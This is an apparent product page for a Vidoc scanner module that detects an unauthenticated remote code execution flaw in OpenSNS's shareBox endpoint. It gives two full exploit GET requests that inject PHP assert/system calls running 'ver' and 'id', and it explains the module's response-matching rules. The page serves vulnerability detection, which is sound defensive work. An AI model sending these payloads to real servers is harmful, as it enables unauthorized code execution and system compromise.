Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

OpenSNS - Remote Code Execution

By kannthu

Vidoc logoVidoc Module

What is "OpenSNS - Remote Code Execution?"

The "OpenSNS - Remote Code Execution" module is a test case designed to detect a critical vulnerability in the OpenSNS software. OpenSNS is a social networking platform that allows users to create and manage their own social networks. This module focuses on the "shareBox" endpoint, which is vulnerable to remote unauthenticated code execution.

The severity of this vulnerability is classified as critical, with a CVSS score of 10. This means that it poses a significant risk to the security and integrity of the OpenSNS application.

This module was authored by gy741.


If successfully exploited, this vulnerability allows remote attackers to execute arbitrary code on the targeted OpenSNS application. This can lead to unauthorized access, data breaches, and potential compromise of the entire system.

How the module works?

The "OpenSNS - Remote Code Execution" module works by sending HTTP requests to the vulnerable "shareBox" endpoint. The module includes two request templates:

GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)

These requests exploit the vulnerability by injecting arbitrary commands into the "cmd" parameter. The module then applies matching conditions to determine if the vulnerability is present:

- The response body must contain either "uid=" or "gid=" and "Microsoft Windows" in order to match the first condition. - The response must contain the word "/Application/" in any part of the response to match the second condition. - The response status code must be 200 to match the third condition.

If all the matching conditions are met, the module reports the vulnerability.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Matching conditions
regex: ((u|g)id=), Microsoft Windowsand
word: /Application/and
status: 200
Passive global matcher
No matching conditions.
On match action
Report vulnerability